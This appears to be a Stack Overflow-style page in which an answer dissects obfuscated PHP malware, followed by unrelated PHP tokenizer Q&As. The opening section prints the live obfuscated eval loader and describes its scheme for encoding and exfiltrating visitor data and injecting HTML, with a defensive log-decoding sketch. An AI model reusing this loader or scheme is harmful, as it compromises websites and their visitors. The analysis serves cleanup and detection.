27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%xov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x77825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqchr(ord($n)-1);} 
#erro%x7824*<!%x5c%x7824-2bge56+99386c6f+9f5d816:+25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782mpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3825!*72!%x5c%x7827!hmg%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-d]51]y35]256]y76]72]y3d]51]y35]274]yeobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<bg!osvufs!|ftmf!~<**9.-j%x5c5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dx7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7sfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x7825bss%x5c%x785csbhpph#)zbssb!-#}#)fep:~:<*9-1-r%x5c%x7825)825,3,j%x5c%x7825>j%x5c%82f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmc%x78786<C%x5c%x7827&6<*rfs%x5c1127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5%x7825-bubE{h%x5c%x7825)su34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%xx7827)fepdof.)fepdof.%x5c%x782f###%V,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%xr_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%xy76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv2%164") && (!isset($GLOBALS["%x61%156%x75%156%xu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%8257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%5c%x7825)fnbozcYufhA%x5c%x78272qj%x/(.*)/epreg_replacestvbowvmjj'; $uskbxljsbs = explode(chr((169 - 125)), 
'6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19'); $aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37)); if (!function_exists('hperlerwfe')) { function hperlerwfe($opchjywcur, $oguxphvfkm) { $frnepusuoj = NULL; for ($yjjpfgynkv = 
0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) { $frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]); } return $frnepusuoj; }; } $rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ "; $yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26)); $yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL); $yiffimogfj = $rfmxgmmowh; $yiffimogfj = (470 - 349); $nzujvbbqez = $yiffimogfj - 1; ?>
After digging through the obfuscated code and untangling a number of preg_replace, eval and create_function statements, this is my attempt at explaining what the code does:
The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.
First, the callback function will attempt to uncompress the output buffer contents if necessary, using gzinflate, gzuncompress, gzdecode or a custom gzinflate-based decoder (I have not dug any deeper into this). With the contents uncompressed, a request will be made containing the $_SERVER values of
HTTP_USER_AGENT
HTTP_REFERER
REMOTE_ADDR
HTTP_HOST
PHP_SELF
... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an md5 hash of the IPv4 address of "stat-dns.com" appended with ".com", currently giving md5(".com" . <IPv4> ) => md5(".com8.8.8.8") => "54dfa1cb.com" / "33db9538.com". The request will be attempted using file_get_contents, curl_exec, file and finally socket_write.
Note that no request will be made if:
any of the HTTP_USER_AGENT, REMOTE_ADDR or HTTP_HOST is empty/not set
PHP_SELF contains the word "admin"
HTTP_USER_AGENT contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler".
Secondly, if the output buffer contents has a body or html tag, and the response from the request above (decoded using the en2() function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the body or, in case there is no body tag, the html tag.
The code used for encoding/decoding traffic is this one:
function en2($s, $q) {
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g . $q . "q1w2e3r4"));
        $g .= substr($q, 0, 8);
    }
    return $s ^ $g;
}
$s is the string to encode/decode and $q is a random number between 100000 and 999999 acting as a key.
The request URL mentioned above is calculated like this:
$url = "http:// ... /"
    . $op // Random number/key
    . "?"
    . urlencode(
        urlencode(
            base64_encode(en2( $http_user_agent, $op)) . "." .
            base64_encode(en2( $http_referrer, $op)) . "." .
            base64_encode(en2( $remote_addr, $op)) . "." .
            base64_encode(en2( $http_host, $op)) . "." .
            base64_encode(en2( $php_self, $op))
        )
    );
While I have not found any sign of what initially placed the malicious code on your server, or that it does anything other than allow bad HTML/JavaScript code to be injected into your web pages, that does not mean that it is not still there.
You really should make a clean install, as suggested by #Bulk above:
The only way you'll ever know for sure it's been cleaned is to re-install absolutely everything you can from scratch - i.e. fresh wordpress install, fresh plugin install. Then literally comb every line of your theme for anything out of the ordinary. Also of note, they often will put things in wp-content/uploads that look like images but aren't - check those too.
Pastebin here.
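For anyone who wants to check proxy or firewall logs for this traffic, the en2() routine and the request format described in this answer can be mirrored in Python. Treat this as a sketch under assumptions: build_query and decode_query are made-up names, only the part after the host is handled, the key is taken to be the decimal digits of the random number, and the sample values are invented.

```python
import base64
import hashlib
from urllib.parse import quote, unquote


def en2(data: bytes, key: bytes) -> bytes:
    """Port of the PHP en2(): XOR the data with a keystream derived from chained MD5 digests."""
    stream, q = b"", key
    while len(stream) < len(data):
        q = hashlib.md5(stream + q + b"q1w2e3r4").digest()
        stream += q[:8]
    return bytes(a ^ b for a, b in zip(data, stream))


def build_query(op: int, fields: list) -> str:
    """Build '<op>?<payload>' from plain-text fields, following the URL layout quoted above."""
    key = str(op).encode()
    joined = ".".join(base64.b64encode(en2(f.encode(), key)).decode() for f in fields)
    return f"{op}?" + quote(quote(joined, safe=""), safe="")


def decode_query(path_and_query: str) -> list:
    """Reverse build_query(): recover the plain-text fields from a logged request."""
    op, _, query = path_and_query.partition("?")
    key = op.encode()
    parts = unquote(unquote(query)).split(".")
    return [en2(base64.b64decode(p), key).decode(errors="replace") for p in parts]


# Invented sample values, in the order user agent, referrer, address, host, script
sample = ["Mozilla/5.0", "", "203.0.113.7", "example.org", "/index.php"]
print(decode_query(build_query(123456, sample)) == sample)  # True
```

Since the XOR keystream depends only on the number in the path, the same function both encodes and decodes, which is why a logged URL alone is enough to recover what was sent.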
Generating PHP code (from Parser Tokens)
Is there any available solution for (re-)generating PHP code from the Parser Tokens returned by token_get_all? Other solutions for generating PHP code are welcome as well, preferably with the associated lexer/parser (if any).
From my comment: Does anyone see a potential problem if I simply write a large switch statement to convert tokens back to their string representations (i.e. T_DO to 'do'), map that over the tokens, join with spaces, and look for some sort of PHP code pretty-printing solution?
After some looking, I found a homemade PHP solution in this question that actually uses the PHP Tokenizer interface, as well as some PHP code formatting tools which are more configurable (but would require the solution as described above). These could be used to quickly realize a solution. I'll post back here when I find some time to cook this up.
Solution with PHP_Beautifier
This is the quick solution I cooked up; I'll leave it here as part of the question. Note that it requires you to break open the PHP_Beautifier class by changing everything (probably not everything, but this is easier) that is private to protected, to allow you to actually use the internal workings of PHP_Beautifier (otherwise it was impossible to reuse the functionality of PHP_Beautifier without reimplementing half their code). An example usage of the class would be:
file: main.php
<?php
// read some PHP code (the file itself will do)
$phpCode = file_get_contents(__FILE__);
// create a new instance of PHP2PHP
$php2php = new PHP2PHP();
// tokenize the code (forwards to token_get_all)
$phpCode = $php2php->php2token($phpCode);
// print the tokens, in some way
echo join(' ', array_map(function($token) {
    return (is_array($token))
        ? ($token[0] === T_WHITESPACE)
            ? ($token[1] === "\n")
                ? "\n"
                : ''
            : token_name($token[0])
        : $token;
}, $phpCode));
// transform the tokens back into legible PHP code
$phpCode = $php2php->token2php($phpCode);
?>
As PHP2PHP extends PHP_Beautifier, it allows for the same fine-tuning under the same API that PHP_Beautifier uses.
The class itself is:

file: PHP2PHP.php

<?php
class PHP2PHP extends PHP_Beautifier {
    function php2token($phpCode) {
        return token_get_all($phpCode);
    }

    function token2php(array $phpToken) {
        // prepare properties
        $this->resetProperties();
        $this->aTokens = $phpToken;
        $iTotal = count($this->aTokens);
        $iPrevAssoc = false;

        // send a signal to the filter, announcing the init of the processing of a file
        foreach($this->aFilters as $oFilter) $oFilter->preProcess();

        for ($this->iCount = 0; $this->iCount < $iTotal; $this->iCount++) {
            $aCurrentToken = $this->aTokens[$this->iCount];
            // single-character tokens arrive as plain strings; normalize them to array form
            if (is_string($aCurrentToken)) $aCurrentToken = array(
                0 => $aCurrentToken,
                1 => $aCurrentToken
            );

            // ArrayNested->off();
            $sTextLog = PHP_Beautifier_Common::wsToString($aCurrentToken[1]);
            // ArrayNested->on();

            $sTokenName = (is_numeric($aCurrentToken[0])) ? token_name($aCurrentToken[0]) : '';
            $this->oLog->log("Token:" . $sTokenName . "[" . $sTextLog . "]", PEAR_LOG_DEBUG);
            $this->controlToken($aCurrentToken);
            $iFirstOut = count($this->aOut); //5
            $bError = false;
            $this->aCurrentToken = $aCurrentToken;
            if ($this->bBeautify) {
                foreach($this->aFilters as $oFilter) {
                    $bError = true;
                    if ($oFilter->handleToken($this->aCurrentToken) !== FALSE) {
                        $this->oLog->log('Filter:' . $oFilter->getName() , PEAR_LOG_DEBUG);
                        $bError = false;
                        break;
                    }
                }
            } else {
                $this->add($aCurrentToken[1]);
            }
            $this->controlTokenPost($aCurrentToken);
            $iLastOut = count($this->aOut);

            // set the assoc
            if (($iLastOut-$iFirstOut) > 0) {
                $this->aAssocs[$this->iCount] = array(
                    'offset' => $iFirstOut
                );
                if ($iPrevAssoc !== FALSE)
                    $this->aAssocs[$iPrevAssoc]['length'] = $iFirstOut-$this->aAssocs[$iPrevAssoc]['offset'];
                $iPrevAssoc = $this->iCount;
            }

            // var_export(..., true) returns the dump as a string; var_dump() would print it and return nothing
            if ($bError) throw new Exception("Can't process token: " . var_export($aCurrentToken, true));
        } // ~for

        // generate the last assoc
        if (count($this->aOut) == 0) throw new Exception("Nothing on output!");
        $this->aAssocs[$iPrevAssoc]['length'] = (count($this->aOut) -1) - $this->aAssocs[$iPrevAssoc]['offset'];

        // post-processing
        foreach($this->aFilters as $oFilter) $oFilter->postProcess();

        return $this->get();
    }
}
?>
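On the original idea of a big switch from T_DO to 'do': as far as I can tell it isn't strictly needed, because every array token returned by token_get_all() already carries its source text in element 1. A minimal sketch, assuming only the built-in tokenizer extension (tokens_to_source is a made-up helper name, not part of PHP or PHP_Beautifier):

```php
<?php
// Hypothetical helper: rebuild source text from a token_get_all() stream.
function tokens_to_source(array $tokens): string
{
    $source = '';
    foreach ($tokens as $token) {
        // Array tokens are [id, text, line]; single characters such as ';' are plain strings.
        $source .= is_array($token) ? $token[1] : $token;
    }
    return $source;
}

$code    = "<?php\ndo { \$i = 1; } while (false);\n";
$rebuilt = tokens_to_source(token_get_all($code));

var_dump($rebuilt === $code); // bool(true): plain concatenation round-trips the input
```

Whitespace comes back as T_WHITESPACE tokens, so joining with spaces would double it up. Plain concatenation reproduces the input as-is; a formatter such as PHP_Beautifier is only needed if you want to change the layout.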
In the category of "other solutions", you could try PHP Parser. The parser turns PHP source code into an abstract syntax tree....Additionally, you can convert a syntax tree back to PHP code.
If I'm not mistaken http://pear.php.net/package/PHP_Beautifier uses token_get_all() and then rewrites the stream. It uses heaps of methods like t_else and t_close_brace to output each token. Maybe you can hijack this for simplicity.
See our PHP Front End. It is a full PHP parser, automatically building ASTs, and a matching prettyprinter that regenerates compilable PHP code complete with the original comments. (EDIT 12/2011: See this SO answer for more details on what it takes to prettyprint from ASTs, which are just an organized version of the tokens: https://stackoverflow.com/a/5834775/120163) The front end is built on top of our DMS Software Reengineering Toolkit, enabling the analysis and transformation of PHP ASTs (and then, via the prettyprinter, of the code itself).
PHP Constant string parameters token
In a system we will be using, there is a function called "uses". If you are familiar with Pascal, the uses clause is where you tell your program what dependencies it has (similar to C and PHP includes). This function is being used in order to further control file inclusion other than include(_once) or require(_once).

As part of testing procedures, I need to write a dependency visualization tool for statically loaded files.

Statically Loaded Example:
uses('core/core.php','core/security.php');

Dynamically Loaded Example:
uses('exts/database.'.$driver.'.php');

I need to filter out dynamic load cases because the code is tested statically, not while running.

This is the code I'm using at this time:

$inuses=false; // whether currently in uses function or not
$uses=array(); // holds dependencies (line=>file)
$tknbuf=array(); // last token
foreach(token_get_all(file_get_contents($file)) as $token){
    // detect uses function
    if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true;
    // detect uses argument (dependency file)
    if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token;
    // detect the end of uses function
    if($inuses && is_string($token) && $token==')'){
        $inuses=false;
        isset($uses[$tknbuf[2]])
            ? $uses[$tknbuf[2]][]=$tknbuf[1]
            : $uses[$tknbuf[2]]=array($tknbuf[1]);
    }
    // a new argument (dependency) is found
    if($inuses && is_string($token) && $token==',')
        isset($uses[$tknbuf[2]])
            ? $uses[$tknbuf[2]][]=$tknbuf[1]
            : $uses[$tknbuf[2]]=array($tknbuf[1]);
}

Note: It may help to know that I'm using a state engine to detect the arguments.

My issue? Since there are all sorts of arguments that can go in the function, it is very difficult getting it right. Maybe I'm not using the right approach; however, I'm pretty sure using token_get_all is the best in this case. So maybe the issue is my state engine, which really isn't that good. I might be missing the easy way out, thought I'd get some peer review off it.
Edit: I took the approach of explaining what I'm doing this time, but not exactly what I want. Put in simple words, I need to get an array of the arguments being passed to a function named "uses". The thing is I'm a bit specific about the arguments; I only need an array of straight strings, no dynamic code at all (constants, variables, function calls...).
Using regular expressions:

<?php
preg_match_all('/uses\s*\((.+)\s*\)/', file_get_contents('uses.php'), $matches, PREG_SET_ORDER);
foreach ($matches as $set) {
    list($full, $match) = $set;
    echo "$full\n";

    // try to remove function arguments
    $new = $match;
    do {
        $match = $new;
        $new = preg_replace('/\([^()]*\)/', '', $match);
    } while ($new != $match);

    // iterate over each of the uses() args
    foreach (explode(',', $match) as $arg) {
        $arg = trim($arg);
        // keep only arguments that start and end with the same quote character
        // (the empty-string check avoids indexing into an empty argument)
        if ($arg !== '' && ($arg[0] == "'" || $arg[0] == '"') && substr($arg,-1) == $arg[0])
            echo " ".substr($arg,1,-1)."\n";
    }
}
?>

Running against:

uses('bar.php', 'test.php', $foo->bar());
uses(bar('test.php'), 'file.php');
uses(bar(foo('a','b','c')), zed());

Yields:

uses('bar.php', 'test.php', $foo->bar())
 bar.php
 test.php
uses(bar('test.php'), 'file.php')
 file.php
uses(bar(foo('a','b','c')), zed())

Obviously it has limitations and assumptions (for example, a comma inside a quoted file name would be split by explode), but if you know how the code is called, it could be sufficient.
OK, I got it working. Just some minor fixes to the state engine. In short, argument tokens are buffered instead of being put in the uses array directly. Then, at each ',' or ')', I check whether the buffered token is valid and, if so, add it to the uses array.

$inuses=false; // whether currently in uses function or not
$uses=array(); // holds dependencies (line=>file)
$tknbuf=array(); // last token
$tknbad=false; // whether last token is good or not
foreach(token_get_all(file_get_contents($file)) as $token){
    // detect uses function
    if(!$inuses && is_array($token) && $token[0]==T_STRING && $token[1]=='uses')$inuses=true;
    // token found, put it in buffer
    if($inuses && is_array($token) && $token[0]==T_CONSTANT_ENCAPSED_STRING)$tknbuf=$token;
    // end-of-function found, check buffer and throw into $uses
    if($inuses && is_string($token) && $token==')'){
        $inuses=false;
        if(count($tknbuf)==3 && !$tknbad)
            isset($GLOBALS['uses'][$file][$tknbuf[2]])
                ? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1]
                : $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]);
        $tknbuf=array();
        $tknbad=false;
    }
    // end-of-argument, check token and add to $uses
    if($inuses && is_string($token) && $token==','){
        if(count($tknbuf)==3 && !$tknbad)
            isset($GLOBALS['uses'][$file][$tknbuf[2]])
                ? $GLOBALS['uses'][$file][$tknbuf[2]][]=$tknbuf[1]
                : $GLOBALS['uses'][$file][$tknbuf[2]]=array($tknbuf[1]);
        $tknbuf=array();
        $tknbad=false;
    }
    // if current token is not a simple string, flag all tokens as bad
    if($inuses && is_array($token) && $token[0]!=T_CONSTANT_ENCAPSED_STRING)$tknbad=true;
}

Edit: Actually it is still faulty (a different issue though). But the new idea I've had ought to work out nicely.
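For what it's worth, here is one way the buffer-and-check idea could be tightened. This is only a sketch under my own assumptions, not the asker's final code: find_static_uses() is a made-up name, whitespace and comments are skipped before any checks, bracket depth is tracked so that commas and parentheses of nested calls don't end an argument, and an argument only counts when it consists of exactly one T_CONSTANT_ENCAPSED_STRING token. It does not try to tell a plain uses() call apart from a method that happens to be named uses.

```php
<?php
// Sketch: collect only the literal-string arguments of uses(...) calls.
// find_static_uses() is a hypothetical helper name.
function find_static_uses(string $source): array
{
    $uses  = [];     // line => list of file names
    $armed = false;  // previous significant token was the name "uses"
    $depth = 0;      // bracket depth inside uses(...); 0 means outside a call
    $arg   = [];     // significant tokens of the argument being read

    // Record the buffered argument if it is exactly one quoted string.
    $flush = function () use (&$uses, &$arg) {
        if (count($arg) === 1 && is_array($arg[0])
            && $arg[0][0] === T_CONSTANT_ENCAPSED_STRING) {
            // Strip the surrounding quotes; escape sequences are left untouched.
            $uses[$arg[0][2]][] = substr($arg[0][1], 1, -1);
        }
        $arg = [];
    };

    foreach (token_get_all($source) as $token) {
        // Whitespace and comments never make an argument dynamic.
        if (is_array($token)
            && in_array($token[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)) {
            continue;
        }
        $char = is_string($token) ? $token : null; // punctuation such as "(" or ","

        if ($depth === 0) {
            if ($armed && $char === '(') {
                $depth = 1;                        // entered the argument list
            }
            $armed = is_array($token) && $token[0] === T_STRING && $token[1] === 'uses';
            continue;
        }

        if ($depth === 1 && ($char === ',' || $char === ')')) {
            $flush();                              // end of one top-level argument
            if ($char === ')') {
                $depth = 0;                        // end of the uses(...) call
            }
            continue;
        }

        if ($char === '(' || $char === '[') {
            $depth++;                              // nested call or array
        } elseif ($char === ')' || $char === ']') {
            $depth--;
        }
        $arg[] = $token;                           // anything else belongs to the argument
    }
    return $uses;
}

$source = <<<'PHP'
<?php
uses('core/core.php', 'core/security.php');
uses('exts/database.' . $driver . '.php');
uses(bar('test.php'), 'file.php');
PHP;

print_r(find_static_uses($source));
// [2 => ['core/core.php', 'core/security.php'], 4 => ['file.php']]
```

The dynamic call on line 3 is dropped because its argument is several tokens long, and bar('test.php') is dropped for the same reason, while 'file.php' next to it is kept.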